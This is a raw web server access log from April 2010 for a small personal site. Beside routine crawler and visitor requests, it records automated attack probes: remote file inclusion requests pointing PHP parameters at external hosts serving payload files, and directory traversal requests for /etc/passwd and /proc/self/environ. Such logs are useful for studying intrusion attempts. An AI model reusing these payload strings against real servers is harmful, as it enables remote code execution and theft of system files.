211.236.43.200 - - [22/Apr/2010:19:59:37 -0500] "GET /solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.236.43.200 - - [22/Apr/2010:19:59:37 -0500] "GET /logs/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.236.43.200 - - [22/Apr/2010:19:59:37 -0500] "GET /logs/access_log.1271030400/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.236.43.200 - - [22/Apr/2010:19:59:59 -0500] "GET /logs/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.236.43.200 - - [22/Apr/2010:19:59:59 -0500] "GET /solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.236.43.200 - - [22/Apr/2010:20:00:00 -0500] "GET /logs/access_log.1271030400/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.236.43.200 - - [22/Apr/2010:20:01:47 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.236.43.200 - - [22/Apr/2010:20:01:47 -0500] "GET /logs/access_log.1265500800/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.236.43.200 - - [22/Apr/2010:20:02:03 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.236.43.200 - - [22/Apr/2010:20:02:03 -0500] "GET /logs/access_log.1265500800/solpot.html?body=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 322 "-""Mozilla/5.0"
59.21.247.137 - - [22/Apr/2010:20:02:50 -0500] "GET /write.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.21.247.137 - - [22/Apr/2010:20:02:50 -0500] "GET /logs/access_log.1265760000/write.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.21.247.137 - - [22/Apr/2010:20:02:50 -0500] "GET /logs/write.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.46.13.100 - - [22/Apr/2010:20:04:55 -0500] "GET /logs/access_log.1194480000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
59.21.247.137 - - [22/Apr/2010:20:07:26 -0500] "GET /logs/access_log.1262649600/write.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.21.247.137 - - [22/Apr/2010:20:07:26 -0500] "GET /write.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.21.247.137 - - [22/Apr/2010:20:07:26 -0500] "GET /logs/write.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.186.152.146 - - [22/Apr/2010:20:07:40 -0500] "GET /tattoo HTTP/1.1" 301 330 "http://en.wikipedia.org/wiki/File:Tat_c_18-500.jpg""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:20:07:40 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "http://en.wikipedia.org/wiki/File:Tat_c_18-500.jpg""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:20:07:47 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:20:07:47 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:20:07:47 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
67.186.152.146 - - [22/Apr/2010:20:07:47 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
119.63.193.56 - - [22/Apr/2010:20:10:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
121.254.228.21 - - [22/Apr/2010:20:11:11 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.254.228.21 - - [22/Apr/2010:20:11:11 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
121.254.228.21 - - [22/Apr/2010:20:11:11 -0500] "GET /logs/access_log.1262736000//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [22/Apr/2010:20:11:56 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.254.228.21 - - [22/Apr/2010:20:12:02 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
121.254.228.21 - - [22/Apr/2010:20:12:02 -0500] "GET /logs/access_log.1270684800%20%20//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:20:12:13 -0500] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:20:12:13 -0500] "GET /logs/access_log.1222387200//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:20:12:13 -0500] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:20:12:41 -0500] "GET /logs/access_log.1222387200//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:20:12:41 -0500] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:20:12:41 -0500] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
59.21.247.137 - - [22/Apr/2010:20:13:10 -0500] "GET ///skin/dognara_gallery/view.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
59.21.247.137 - - [22/Apr/2010:20:13:10 -0500] "GET /logs///skin/dognara_gallery/view.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.21.247.137 - - [22/Apr/2010:20:13:10 -0500] "GET /logs/access_log.1266019200///skin/dognara_gallery/view.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:20:16:50 -0500] "GET /logs/access_log.1270684800%20%20//delete_all.php?board_skin_path=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:20:16:50 -0500] "GET //delete_all.php?board_skin_path=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:20:16:50 -0500] "GET /logs//delete_all.php?board_skin_path=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
207.46.204.229 - - [22/Apr/2010:20:19:55 -0500] "GET /logs/access_log.1156550400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.191 - - [22/Apr/2010:20:21:54 -0500] "GET /logs/access_log.1240358400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.70.32.2 - - [22/Apr/2010:20:28:46 -0500] "GET /logs/access_log.1270598400%20%20//delete_all.php?board_skin_path=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [22/Apr/2010:20:30:34 -0500] "GET //zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [22/Apr/2010:20:30:34 -0500] "GET /logs//zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
124.49.100.254 - - [22/Apr/2010:20:30:34 -0500] "GET /logs/access_log.1265587200//zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
213.3.11.188 - - [22/Apr/2010:20:31:46 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
213.3.11.188 - - [22/Apr/2010:20:31:47 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
207.46.13.95 - - [22/Apr/2010:20:37:24 -0500] "GET /logs/access_log.1231804800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.96.30.50 - - [22/Apr/2010:20:37:41 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
58.96.30.50 - - [22/Apr/2010:20:37:41 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
121.254.228.21 - - [22/Apr/2010:20:38:08 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
121.254.228.21 - - [22/Apr/2010:20:38:08 -0500] "GET /logs/access_log.1212969600%20%20//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.254.228.21 - - [22/Apr/2010:20:38:08 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.254.228.21 - - [22/Apr/2010:20:39:45 -0500] "GET /logs/access_log.1238803200%20%20//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:45:04 -0500] "GET /logs//index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:45:04 -0500] "GET /logs/access_log.1212105600//index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:45:04 -0500] "GET //index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:45:18 -0500] "GET //index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:45:18 -0500] "GET /logs/access_log.1212105600//index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:45:18 -0500] "GET /logs//index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:46:27 -0500] "GET //index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:46:27 -0500] "GET /logs/access_log.1212105600%20%20//index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:46:27 -0500] "GET /logs//index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:46:32 -0500] "GET //index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:46:32 -0500] "GET /logs//index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [22/Apr/2010:20:46:32 -0500] "GET /logs/access_log.1212105600%20%20//index.php/?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.122.28.5 - - [22/Apr/2010:20:48:58 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.122.28.5 - - [22/Apr/2010:20:48:59 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.122.28.5 - - [22/Apr/2010:20:48:59 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.254.54.122 - - [22/Apr/2010:20:49:30 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
64.251.10.117 - - [22/Apr/2010:20:49:35 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
217.70.32.2 - - [22/Apr/2010:20:49:52 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
217.70.32.2 - - [22/Apr/2010:20:49:52 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.216.234.1 - - [22/Apr/2010:20:49:52 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.70.32.2 - - [22/Apr/2010:20:49:57 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://hdmi.interfree.it/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
204.14.3.162 - - [22/Apr/2010:20:50:02 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
91.121.167.15 - - [22/Apr/2010:20:50:03 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
207.46.13.134 - - [22/Apr/2010:20:50:24 -0500] "GET /logs/access_log.1264204800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.49.100.254 - - [22/Apr/2010:20:51:04 -0500] "GET //zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [22/Apr/2010:20:51:04 -0500] "GET /logs/access_log.1265587200//zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
124.49.100.254 - - [22/Apr/2010:20:51:04 -0500] "GET /logs//zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.195.112.180 - - [22/Apr/2010:20:51:11 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [22/Apr/2010:20:51:12 -0500] "GET /logs/access_log.1256342400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.49.100.254 - - [22/Apr/2010:20:51:18 -0500] "GET /logs/access_log.1265587200//zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
124.49.100.254 - - [22/Apr/2010:20:51:18 -0500] "GET /logs//zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
124.49.100.254 - - [22/Apr/2010:20:51:18 -0500] "GET //zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [22/Apr/2010:20:51:37 -0500] "GET /logs//zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
124.49.100.254 - - [22/Apr/2010:20:51:37 -0500] "GET //zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [22/Apr/2010:20:51:37 -0500] "GET /logs/access_log.1265587200//zero//skin/voy_window_blue/write.php?dir=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
207.46.195.237 - - [22/Apr/2010:20:52:25 -0500] "GET /logs/access_log.1154736000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.216.234.1 - - [22/Apr/2010:20:52:42 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.216.234.1 - - [22/Apr/2010:20:52:42 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
195.216.234.1 - - [22/Apr/2010:20:52:43 -0500] "GET /logs///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
65.254.54.122 - - [22/Apr/2010:20:53:21 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.254.54.122 - - [22/Apr/2010:20:53:21 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
65.254.54.122 - - [22/Apr/2010:20:53:21 -0500] "GET /logs///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
61.135.134.108 - - [22/Apr/2010:20:53:32 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
61.135.134.108 - - [22/Apr/2010:20:53:32 -0500] "GET /logs/access_log.1225238400//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
61.135.134.108 - - [22/Apr/2010:20:53:32 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
64.251.10.117 - - [22/Apr/2010:20:53:41 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
64.251.10.117 - - [22/Apr/2010:20:53:41 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
64.251.10.117 - - [22/Apr/2010:20:53:41 -0500] "GET /logs///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
91.121.167.15 - - [22/Apr/2010:20:53:51 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
91.121.167.15 - - [22/Apr/2010:20:53:51 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
91.121.167.15 - - [22/Apr/2010:20:53:51 -0500] "GET /logs///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
64.251.10.117 - - [22/Apr/2010:20:53:53 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.254.54.122 - - [22/Apr/2010:20:53:53 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
65.254.54.122 - - [22/Apr/2010:20:53:53 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
64.251.10.117 - - [22/Apr/2010:20:53:53 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
65.254.54.122 - - [22/Apr/2010:20:53:53 -0500] "GET /logs///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
64.251.10.117 - - [22/Apr/2010:20:53:59 -0500] "GET /logs///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
67.195.112.180 - - [22/Apr/2010:20:54:16 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.14.3.162 - - [22/Apr/2010:20:55:03 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
204.14.3.162 - - [22/Apr/2010:20:55:03 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
204.14.3.162 - - [22/Apr/2010:20:55:03 -0500] "GET /logs///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
61.135.134.108 - - [22/Apr/2010:20:55:22 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
61.135.134.108 - - [22/Apr/2010:20:55:22 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 2842 "-""Mozilla/5.0"
61.135.134.108 - - [22/Apr/2010:20:55:22 -0500] "GET /logs/access_log.1270684800%20%20//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
204.14.3.162 - - [22/Apr/2010:20:55:31 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
204.14.3.162 - - [22/Apr/2010:20:55:31 -0500] "GET ///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
204.14.3.162 - - [22/Apr/2010:20:55:31 -0500] "GET /logs///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
91.121.167.15 - - [22/Apr/2010:20:55:52 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
